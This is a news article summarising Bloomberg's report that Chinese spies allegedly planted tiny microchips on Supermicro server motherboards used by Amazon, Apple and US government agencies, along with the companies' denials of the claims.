According to an in-depth report by Bloomberg yesterday, Chinese spies secretly inserted microchips within servers at Apple, Amazon, the US Department of Defense, the Central Intelligence Agency, the Navy, among others. What Bloomberg’s Big Hack Exposé revealed? The tiny chips were made to be undetectable without specialist equipment. These were later implanted on to the motherboards of servers on the production line in China. These servers were allegedly assembled by Super Micro Computer Inc., a San Jose-based company, one of the world’s biggest suppliers of server motherboards. Supermicro's customers include Elemental Technologies, a streaming services startup which was acquired by Amazon in 2015 and provided the foundation for the expansion of the Amazon Prime Video platform. According to the report, the Chinese People's Liberation Army (PLA) used illicit chips on hardware during the manufacturing process of server systems in factories. How did Amazon detect these microchips? In late 2015, Elemental’s staff boxed up several servers and sent them to Ontario, Canada, for the third-party security company to test. The testers found a tiny microchip, not much bigger than a grain of rice, that wasn’t part of the boards’ original design, nested on the servers’ motherboards. Following this, Amazon reported the discovery to U.S. authorities which shocked the intelligence community. This is because, Elemental’s servers are ubiquitous and used across US key government agencies such as in Department of Defense data centers, the CIA’s drone operations, and the onboard networks of Navy warships. And Elemental was just one of the hundreds of Supermicro customers. According to the Bloomberg report, “The chips were reportedly built to be as inconspicuous as possible and to mimic signal conditioning couplers. It was determined during an investigation, which took three years to conclude, that the chip "allowed the attackers to create a stealth doorway into any network that included the altered machines.” The report claims Amazon became aware of the attack during moves to purchase streaming video compression firm Elemental Technologies in 2015. Elemental's services appear to have been an ideal target for Chinese state-sponsored attackers to conduct covert surveillance. According to Bloomberg, Apple was one of the victims of the apparent breach. Bloomberg says that Apple found the malicious chips in 2015 subsequently cutting ties with Supermicro in 2016. Amazon, Apple, and Supermicro deny supply chain compromise Amazon and Apple have both strongly denied the results of the investigation. Amazon said, "It's untrue that AWS knew about a supply chain compromise, an issue with malicious chips, or hardware modifications when acquiring Elemental. It's also untrue that AWS knew about servers containing malicious chips or modifications in data centers based in China, or that AWS worked with the FBI to investigate or provide data about malicious hardware." Apple affirms that internal investigations have been conducted based on Bloomberg queries, and no evidence was found to support the accusations. The only infected driver was discovered in 2016 on a single Supermicro server found in Apple Labs. It was this incident which may have led to the severed business relationship back in 2016, rather than the discovery of malicious chips or a widespread supply chain attack. Supermicro confirms that they were not aware of any investigation regarding the topic nor were they contacted by any government agency in this regard. Bloomberg says the denials are in direct contrast to the testimony of six current and former national security officials, as well as confirmation by 17 anonymous sources which said the nature of the Supermicro compromise was accurate. Bloomberg's investigation has not been confirmed on the record by the FBI. To know about this news in detail, visit Bloomberg News. “Intel ME has a Manufacturing Mode vulnerability, and even giant manufacturers like Apple are not immune,” say researchers Amazon increases the minimum wage of all employees in the US and UK Bloomberg says Google, Mastercard covertly track customers’ offline retail habits via a secret million dollar ad deal
Read more
  • 0
  • 0
  • 13884
Modal Close icon
Modal Close icon